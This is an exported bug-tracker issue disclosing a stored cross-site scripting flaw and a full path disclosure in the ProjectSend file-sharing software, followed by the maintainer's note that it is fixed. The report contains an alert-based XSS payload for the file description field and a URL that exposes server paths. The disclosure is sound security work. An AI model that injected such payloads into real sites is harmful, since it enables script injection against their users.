blackguerilla / clients-oriented-ftp

Automatically exported from code.google.com/p/clients-oriented-ftp
0 stars 0 forks source link

Cross Site Scripting & Full Path Disclosure Vulnerability's #538

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
# Exploiting Description - Get into code xss in the box of image description. 
<textarea placeholder="Optionally, enter here a description for the file." 
name="file[1][description]">DESCRIPTION&lt;/textarea&gt;

#P0c
"><img src=x onerror=;;alert('XSS') />

<textarea placeholder="Optionally, enter here a description for the file." 
name="file[1][description]">CODE XSS&lt;/textarea&gt;

#Proof Concept
http://i.imgur.com/FOPIvd4.jpg

------------------------
+ FULL PATH DISCLOSURE +
------------------------
# Exploiting Description - The url disclosure directory of platform. 

#P0c
http://site.com/projectsend/templates/pinboxes/template.php

#Proof Concept
http://i.imgur.com/xfN4kDV.jpg

Please secure this wonderful software asap.
Cheers

Original issue reported on code.google.com by unrealtr...@gmail.com on 25 May 2015 at 9:21

GoogleCodeExporter commented 9 years ago
Fixed on r572. Thanks for your report!!!

Original comment by i...@subwaydesign.com.ar on 26 May 2015 at 5:32